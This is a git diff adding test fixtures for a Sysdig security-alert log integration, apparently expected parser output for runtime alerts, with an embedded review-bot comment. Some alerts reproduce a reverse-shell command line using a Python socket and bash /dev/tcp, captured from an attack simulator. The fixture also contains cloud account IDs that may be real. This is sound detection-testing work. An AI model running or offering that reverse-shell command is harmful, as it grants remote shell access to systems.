+{"id":"17e047be24848be2ae63efba47ac8869","agentId":57228830,"containerId":"","type":"connection","timestamp":1720453939637554200,"timestampRFC3339Nano":"2024-07-08T15:52:19.637554146Z","labels":{"host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk"}}
+{"id":"17dec38d1ccc838ed8bd3c0690c2a92e","agentId":57841425,"containerId":"","type":"connection","timestamp":1720027118543078400,"timestampRFC3339Nano":"2024-07-03T17:18:38.543078286Z","labels":{"host.hostName":"gke-gke-aliances-test-pa-default-pool-edcdf365-obof"}}
+{"id":"17dec30f432914be51fde04f0a93ff8f","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026578020799700,"timestampRFC3339Nano":"2024-07-03T17:09:38.020799678Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}}
+{"id":"17dec30ec6c62db90219722f069818ce","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026575933943300,"timestampRFC3339Nano":"2024-07-03T17:09:35.933943225Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}}
+{"id":"17dec311bcc23cdab41a9d1b874f923f","agentId":58462617,"containerId":"1eb848eba226","type":"fileaccess","timestamp":1720026588650814700,"timestampRFC3339Nano":"2024-07-03T17:09:48.650814682Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}}
+{"id":"164806f4c47ad9101117d87f8b574ecf","agentId":32212,"containerId":"397be1762fba","name":"nginx-76f9cf7469-k5kf7","timestamp":1606322948648718268,"timestampRFC3339Nano":"2020-11-25T16:49:08.648718268Z","type":"kubernetes","labels":{"host.hostName":"qa-k8smetrics","kubernetes.cluster.name":"demo-env-prom","kubernetes.namespace.name":"nginx","kubernetes.pod.name":"nginx-76f9cf7469-k5kf7"}}
\ No newline at end of file
diff --git a/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json
new file mode 100644
index 00000000000..7ea34ab1df5
--- /dev/null
+++ b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log-expected.json
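Review bot: The third record of this fixture (the "Drop and execute new binary in container" event) double-escapes its placeholders as `\\u003cNA\\u003e` in both `output` and `fields`, while every other record uses `\u003cNA\u003e`, so after JSON decoding that one event carries the literal text `\u003c` instead of `<` and its expected output will differ from the rest for no documented reason; it also has `evt.type=execveproc.args=` with the separating space lost, which looks like a copy/paste artifact rather than genuine agent output, so either normalize the record or add a comment in the expected file stating that the escaping is deliberate. The integer `timestamp` values in the trailing `connection`/`command`/`fileaccess` records (for example `1720453939637554200` next to `2024-07-08T15:52:19.637554146Z`) have already lost precision past 2^53, so the pipeline's `@timestamp` should be derived from `timestampRFC3339Nano` and the expected output checked against that field rather than the integer. The fixture also embeds what appear to be real tenant identifiers (`cloudProvider.account.id` values such as `289645096542`, `414773805239` and `7a100e05-8316-474d-99c0-b824d0e86366`, plus GCP project and Azure instance ids); if these are not already synthetic, replace them with clearly fake placeholders before merging, since committed test data is public and is routinely harvested.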
@@ -0,0 +1,1709 @@ +{ + "expected": [ + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec715376910362c8c3f62a4ceda2e", + "kind": "alert", + "provider": "syscall", + "severity": 7 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root 
container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "User Management Event Detected", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "userdel tmp_suid_user", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/sbin/userdel", + "proc.name": "userdel", + "proc.pcmdline": "pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)", + "proc.pid": "2140169", + "proc.pname": "pwsh", + "proc.ppid": "2140088", + "user.name": "root", + "user.uid": "0" + }, + "output": "Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name= proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent= gggparent= container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request= proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 
RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname= user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "User Management Event Detected", + "ruleTags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. 
Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec715376910362c8c3f62a4ceda2e", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720031001639981110, + "timestampRFC3339Nano": "2024-07-03T18:23:21.63998111Z", + "type": "policy" + }, + "tags": [ + "host", + "container", + "MITRE", + "MITRE_TA0003_persistence", + "MITRE_T1136_create_account", + "MITRE_T1136.001_create_account_local_account", + "MITRE_T1070_indicator_removal", + "MITRE_TA0005_defense_evasion", + "MITRE_TA0040_impact", + "MITRE_T1531_account_access_removal", + "MITRE_T1098_account_manipulation" + ], + "threat.technique.id": [ + "T1136" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": 
"17dec7142e0084978fbafcb03e2cabca", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + 
"beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "c708ed01-9700-4787-91a5-6b2fb9863c0a", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 
proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e0084978fbafcb03e2cabca", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187167383, + "timestampRFC3339Nano": "2024-07-03T18:23:17.187167383Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "agent": { + "id": "58462623" + }, + "cloud": { + "account": { + "id": "7a100e05-8316-474d-99c0-b824d0e86366" + }, + "instance": { + "id": "ba53fc47-1119-4cbb-af2b-6d38b0e56160" + }, + "machine": { + "type": "Standard_D8ds_v5" + }, + "provider": "azure", + "region": "eastus" + }, + "container": { + "id": "8736272bd5fb" + }, + "event": { + "id": 
"17e04791d768c4aba1e9c40d944b8598", + "kind": "alert", + "provider": "syscall", + "severity": 7 + }, + "host": { + "id": "7c:1e:52:0b:2b:61", + "mac": [ + "7C-1E-52-0B-2B-61" + ], + "name": "aks-userpool-12996081-vmss000001" + }, + "log": { + "syslog": { + "severity": { + "code": 7, + "name": "debug" + } + } + }, + "message": "Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "kube-system", + "resource": { + "name": "ama-logs-cxhbd", + "parent": { + "type": "daemonset" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Drop and execute new binary in container", + "ruleset": "Sysdig Runtime Activity Logs", + "version": "35" + }, + "sysdig": { + "agentId": 58462623, + "category": "runtime", + "containerId": "8736272bd5fb", + "content": { + "fields": { + "container.name": "ama-logs", + "proc.cmdline": "ruby /opt/dcr-config-parser.rb", + "proc.cwd": "/opt/", + "proc.exepath": "/usr/bin/ruby", + "proc.name": "ruby", + "proc.pcmdline": "livenessprobe.s /opt/livenessprobe.sh", + "proc.pid": "2817268", + "proc.pname": "livenessprobe.s", + "proc.ppid": "2817253", + "user.name": "root", + "user.uid": "0" + }, + 
"output": "Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)", + "policyOrigin": "Sysdig", + "policyVersion": 35, + "ruleName": "Drop and execute new binary in container", + "ruleTags": [ + "container", + "MITRE", + "MITRE_T1525_implant_internal_image", + "MITRE_TA0003_persistence" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.", + "event": { + "category": "runtime", + "description": "This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. 
Additional manual tuning will likely be required.", + "type": "policy" + }, + "hostMac": "7c:1e:52:0b:2b:61", + "id": "17e04791d768c4aba1e9c40d944b8598", + "labels": { + "azure": { + "instanceId": "ba53fc47-1119-4cbb-af2b-6d38b0e56160", + "instanceName": "aks-userpool-12996081-vmss_1", + "instanceSize": "Standard_D8ds_v5" + }, + "cloudProvider": { + "account": { + "id": "7a100e05-8316-474d-99c0-b824d0e86366" + }, + "name": "azure", + "region": "eastus" + }, + "host": { + "hostName": "aks-userpool-12996081-vmss000001" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "kube-system" + }, + "pod": { + "name": "ama-logs-cxhbd" + }, + "workload": { + "type": "daemonset" + } + } + }, + "machineId": "7c:1e:52:0b:2b:61", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "severity": 7, + "source": "syscall", + "timestamp": 1720453749365327019, + "timestampRFC3339Nano": "2024-07-08T15:49:09.365327019Z", + "type": "policy" + }, + "tags": [ + "container", + "MITRE", + "MITRE_T1525_implant_internal_image", + "MITRE_TA0003_persistence" + ], + "threat.technique.id": [ + "T1525" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e00a9068fb9185f9aa66c21", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + 
"message": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "eb2b3e3c-ebc1-433f-88c7-2e032b75aadc", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + 
"proc.cmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + 
"container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
